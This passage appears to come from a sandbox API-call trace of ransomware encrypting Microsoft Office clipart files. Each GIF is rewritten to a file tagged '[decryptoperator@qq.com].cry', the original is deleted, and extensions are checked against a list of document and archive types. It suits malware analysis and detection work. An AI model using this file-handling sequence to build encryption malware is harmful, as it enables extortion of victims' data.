office\\clipart\\pub60cor\\ag00052_.gif.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0050.910] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00052_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00052_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x22c [0050.910] SetFilePointerEx (in: hFile=0x22c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0050.910] SetFilePointerEx (in: hFile=0x22c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0050.910] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00052_.GIF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00052_.gif.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0050.911] GetLastError () returned 0x0 [0050.911] ReadFile (in: hFile=0x22c, lpBuffer=0x3520020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x225fed4, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesRead=0x225fed4*=0x1e06, lpOverlapped=0x0) returned 1 [0050.917] WriteFile (in: hFile=0x214, lpBuffer=0x3520020*, nNumberOfBytesToWrite=0x1e10, lpNumberOfBytesWritten=0x225fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesWritten=0x225fc9c*=0x1e10, lpOverlapped=0x0) returned 1 [0050.918] ReadFile (in: hFile=0x22c, lpBuffer=0x3520020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x225fed4, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesRead=0x225fed4*=0x0, lpOverlapped=0x0) returned 1 [0050.918] WriteFile (in: hFile=0x214, lpBuffer=0x3520020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x225fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesWritten=0x225fc9c*=0xec, lpOverlapped=0x0) returned 1 [0050.918] SetEndOfFile (hFile=0x214) returned 1 [0050.918] CloseHandle (hObject=0x214) returned 1 [0050.918] SetFilePointerEx (in: hFile=0x22c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0050.918] SetEndOfFile (hFile=0x22c) returned 1 [0050.919] CloseHandle (hObject=0x22c) returned 1 [0050.919] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00052_.GIF.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0050.919] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00052_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00052_.gif")) returned 1 [0050.920] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00052_.GIF") returned 63 [0050.920] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00052_.GIF") returned 63 [0050.920] lstrlenW (lpString=".doc") returned 4 [0050.920] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0050.920] lstrlenW (lpString=".docx") returned 5 [0050.920] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0050.920] lstrlenW (lpString=".pdf") returned 4 [0050.920] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0050.920] lstrlenW (lpString=".xls") returned 4 [0050.920] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0050.920] lstrlenW (lpString=".xlsx") returned 5 [0050.920] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0050.920] lstrlenW (lpString=".ppt") returned 4 [0050.920] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0050.920] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00052_.GIF") returned 63 [0050.920] lstrlenW (lpString=".zip") returned 4 [0050.920] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0050.920] lstrlenW (lpString=".rar") returned 4 [0050.920] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0050.920] lstrlenW (lpString=".bz2") returned 4 [0050.920] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0050.920] lstrlenW (lpString=".7z") returned 3 [0050.920] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0050.920] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00052_.GIF") returned 63 [0050.920] lstrlenW (lpString=".dbf") returned 4 [0050.920] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0050.920] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00052_.GIF") returned 63 [0050.920] lstrlenW (lpString=".1cd") returned 4 [0050.920] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0050.921] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00052_.GIF") returned 63 [0050.921] lstrlenW (lpString=".jpg") returned 4 [0050.921] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0050.921] GetFileSizeEx (in: hFile=0x22c, lpFileSize=0x225ff1c | out: lpFileSize=0x225ff1c*=11891) returned 1 [0050.921] CloseHandle (hObject=0x22c) returned 1 [0050.921] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00057_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00057_.gif")) returned 0x20 [0050.921] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00057_.GIF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00057_.gif.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0050.921] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00057_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00057_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x22c [0050.921] SetFilePointerEx (in: hFile=0x22c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0050.921] SetFilePointerEx (in: hFile=0x22c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0050.921] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00057_.GIF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00057_.gif.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0050.922] GetLastError () returned 0x0 [0050.922] ReadFile (in: hFile=0x22c, lpBuffer=0x3520020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x225fed4, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesRead=0x225fed4*=0x2e73, lpOverlapped=0x0) returned 1 [0050.949] WriteFile (in: hFile=0x214, lpBuffer=0x3520020*, nNumberOfBytesToWrite=0x2e80, lpNumberOfBytesWritten=0x225fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesWritten=0x225fc9c*=0x2e80, lpOverlapped=0x0) returned 1 [0050.950] ReadFile (in: hFile=0x22c, lpBuffer=0x3520020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x225fed4, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesRead=0x225fed4*=0x0, lpOverlapped=0x0) returned 1 [0050.950] WriteFile (in: hFile=0x214, lpBuffer=0x3520020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x225fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesWritten=0x225fc9c*=0xec, lpOverlapped=0x0) returned 1 [0050.950] SetEndOfFile (hFile=0x214) returned 1 [0050.951] CloseHandle (hObject=0x214) returned 1 [0050.951] SetFilePointerEx (in: hFile=0x22c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0050.951] SetEndOfFile (hFile=0x22c) returned 1 [0050.951] CloseHandle (hObject=0x22c) returned 1 [0050.951] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00057_.GIF.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0050.952] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00057_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00057_.gif")) returned 1 [0050.952] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00057_.GIF") returned 63 [0050.952] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00057_.GIF") returned 63 [0050.952] lstrlenW (lpString=".doc") returned 4 [0050.952] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0050.952] lstrlenW (lpString=".docx") returned 5 [0050.952] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0050.952] lstrlenW (lpString=".pdf") returned 4 [0050.952] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0050.952] lstrlenW (lpString=".xls") returned 4 [0050.952] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0050.952] lstrlenW (lpString=".xlsx") returned 5 [0050.952] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0050.952] lstrlenW (lpString=".ppt") returned 4 [0050.952] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0050.952] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00057_.GIF") returned 63 [0050.952] lstrlenW (lpString=".zip") returned 4 [0050.952] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0050.952] lstrlenW (lpString=".rar") returned 4 [0050.952] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0050.952] lstrlenW (lpString=".bz2") returned 4 [0050.952] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0050.952] lstrlenW (lpString=".7z") returned 3 [0050.952] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0050.952] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00057_.GIF") returned 63 [0050.952] lstrlenW (lpString=".dbf") returned 4 [0050.953] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0050.953] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00057_.GIF") returned 63 [0050.953] lstrlenW (lpString=".1cd") returned 4 [0050.953] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0050.953] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00057_.GIF") returned 63 [0050.953] lstrlenW (lpString=".jpg") returned 4 [0050.953] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0050.953] GetFileSizeEx (in: hFile=0x22c, lpFileSize=0x225ff1c | out: lpFileSize=0x225ff1c*=517) returned 1 [0050.953] CloseHandle (hObject=0x22c) returned 1 [0050.953] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00090_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00090_.gif")) returned 0x20 [0050.953] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00090_.GIF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00090_.gif.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0050.953] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00090_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00090_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x22c [0050.953] SetFilePointerEx (in: hFile=0x22c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0050.953] SetFilePointerEx (in: hFile=0x22c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0050.953] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00090_.GIF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00090_.gif.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0050.954] GetLastError () returned 0x0 [0050.954] ReadFile (in: hFile=0x22c, lpBuffer=0x3520020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x225fed4, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesRead=0x225fed4*=0x205, lpOverlapped=0x0) returned 1 [0050.954] WriteFile (in: hFile=0x214, lpBuffer=0x3520020*, nNumberOfBytesToWrite=0x210, lpNumberOfBytesWritten=0x225fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesWritten=0x225fc9c*=0x210, lpOverlapped=0x0) returned 1 [0050.955] ReadFile (in: hFile=0x22c, lpBuffer=0x3520020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x225fed4, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesRead=0x225fed4*=0x0, lpOverlapped=0x0) returned 1 [0050.955] WriteFile (in: hFile=0x214, lpBuffer=0x3520020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x225fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesWritten=0x225fc9c*=0xec, lpOverlapped=0x0) returned 1 [0050.955] SetEndOfFile (hFile=0x214) returned 1 [0050.955] CloseHandle (hObject=0x214) returned 1 [0050.955] SetFilePointerEx (in: hFile=0x22c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0050.956] SetEndOfFile (hFile=0x22c) returned 1 [0050.956] CloseHandle (hObject=0x22c) returned 1 [0050.956] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00090_.GIF.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0050.957] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00090_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00090_.gif")) returned 1 [0050.957] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00090_.GIF") returned 63 [0050.957] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00090_.GIF") returned 63 [0050.957] lstrlenW (lpString=".doc") returned 4 [0050.957] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0050.957] lstrlenW (lpString=".docx") returned 5 [0050.957] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0050.957] lstrlenW (lpString=".pdf") returned 4 [0050.957] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0050.957] lstrlenW (lpString=".xls") returned 4 [0050.957] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0050.957] lstrlenW (lpString=".xlsx") returned 5 [0050.957] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0050.957] lstrlenW (lpString=".ppt") returned 4 [0050.957] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0050.957] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00090_.GIF") returned 63 [0050.957] lstrlenW (lpString=".zip") returned 4 [0050.958] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0050.958] lstrlenW (lpString=".rar") returned 4 [0050.958] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0050.958] lstrlenW (lpString=".bz2") returned 4 [0050.958] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0050.958] lstrlenW (lpString=".7z") returned 3 [0050.958] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0050.958] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00090_.GIF") returned 63 [0050.958] lstrlenW (lpString=".dbf") returned 4 [0050.958] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0050.958] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00090_.GIF") returned 63 [0050.958] lstrlenW (lpString=".1cd") returned 4 [0050.958] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0050.958] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00090_.GIF") returned 63 [0050.958] lstrlenW (lpString=".jpg") returned 4 [0050.958] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0050.959] GetFileSizeEx (in: hFile=0x22c, lpFileSize=0x225ff1c | out: lpFileSize=0x225ff1c*=502) returned 1 [0050.959] CloseHandle (hObject=0x22c) returned 1 [0050.959] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00092_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00092_.gif")) returned 0x20 [0050.959] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00092_.GIF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00092_.gif.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0050.959] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00092_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00092_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x22c [0050.959] SetFilePointerEx (in: hFile=0x22c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0050.959] SetFilePointerEx (in: hFile=0x22c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0050.959] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00092_.GIF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00092_.gif.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0050.959] GetLastError () returned 0x0 [0050.959] ReadFile (in: hFile=0x22c, lpBuffer=0x3520020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x225fed4, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesRead=0x225fed4*=0x1f6, lpOverlapped=0x0) returned 1 [0050.960] WriteFile (in: hFile=0x214, lpBuffer=0x3520020*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x225fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesWritten=0x225fc9c*=0x200, lpOverlapped=0x0) returned 1 [0050.961] ReadFile (in: hFile=0x22c, lpBuffer=0x3520020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x225fed4, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesRead=0x225fed4*=0x0, lpOverlapped=0x0) returned 1 [0050.961] WriteFile (in: hFile=0x214, lpBuffer=0x3520020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x225fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesWritten=0x225fc9c*=0xec, lpOverlapped=0x0) returned 1 [0050.961] SetEndOfFile (hFile=0x214) returned 1 [0050.961] CloseHandle (hObject=0x214) returned 1 [0050.961] SetFilePointerEx (in: hFile=0x22c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0050.961] SetEndOfFile (hFile=0x22c) returned 1 [0050.962] CloseHandle (hObject=0x22c) returned 1 [0050.962] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00092_.GIF.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0050.962] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00092_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00092_.gif")) returned 1 [0050.962] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00092_.GIF") returned 63 [0050.962] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00092_.GIF") returned 63 [0050.962] lstrlenW (lpString=".doc") returned 4 [0050.963] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0050.963] lstrlenW (lpString=".docx") returned 5 [0050.963] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0050.963] lstrlenW (lpString=".pdf") returned 4 [0050.963] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0050.963] lstrlenW (lpString=".xls") returned 4 [0050.963] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0050.963] lstrlenW (lpString=".xlsx") returned 5 [0050.963] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0050.963] lstrlenW (lpString=".ppt") returned 4 [0050.963] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0050.963] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00092_.GIF") returned 63 [0050.963] lstrlenW (lpString=".zip") returned 4 [0050.963] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0050.963] lstrlenW (lpString=".rar") returned 4 [0050.963] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0050.963] lstrlenW (lpString=".bz2") returned 4 [0050.963] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0050.963] lstrlenW (lpString=".7z") returned 3 [0050.963] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0050.963] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00092_.GIF") returned 63 [0050.963] lstrlenW (lpString=".dbf") returned 4 [0050.963] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0050.963] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00092_.GIF") returned 63 [0050.963] lstrlenW (lpString=".1cd") returned 4 [0050.963] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0050.963] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00092_.GIF") returned 63 [0050.963] lstrlenW (lpString=".jpg") returned 4 [0050.963] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0050.969] GetFileSizeEx (in: hFile=0x1bc, lpFileSize=0x225ff1c | out: lpFileSize=0x225ff1c*=12702) returned 1 [0050.969] CloseHandle (hObject=0x1bc) returned 1 [0050.969] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00103_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00103_.gif")) returned 0x20 [0050.969] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00103_.GIF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00103_.gif.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0050.969] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00103_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00103_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1bc [0050.969] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0050.969] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0050.969] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00103_.GIF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00103_.gif.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x22c [0050.970] GetLastError () returned 0x0 [0050.970] ReadFile (in: hFile=0x1bc, lpBuffer=0x3520020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x225fed4, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesRead=0x225fed4*=0x319e, lpOverlapped=0x0) returned 1 [0051.028] WriteFile (in: hFile=0x22c, lpBuffer=0x3520020*, nNumberOfBytesToWrite=0x31a0, lpNumberOfBytesWritten=0x225fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesWritten=0x225fc9c*=0x31a0, lpOverlapped=0x0) returned 1 [0051.029] ReadFile (in: hFile=0x1bc, lpBuffer=0x3520020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x225fed4, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesRead=0x225fed4*=0x0, lpOverlapped=0x0) returned 1 [0051.029] WriteFile (in: hFile=0x22c, lpBuffer=0x3520020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x225fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesWritten=0x225fc9c*=0xec, lpOverlapped=0x0) returned 1 [0051.029] SetEndOfFile (hFile=0x22c) returned 1 [0051.029] CloseHandle (hObject=0x22c) returned 1 [0051.029] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.029] SetEndOfFile (hFile=0x1bc) returned 1 [0051.030] CloseHandle (hObject=0x1bc) returned 1 [0051.030] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00103_.GIF.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0051.030] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00103_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00103_.gif")) returned 1 [0051.031] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00103_.GIF") returned 63 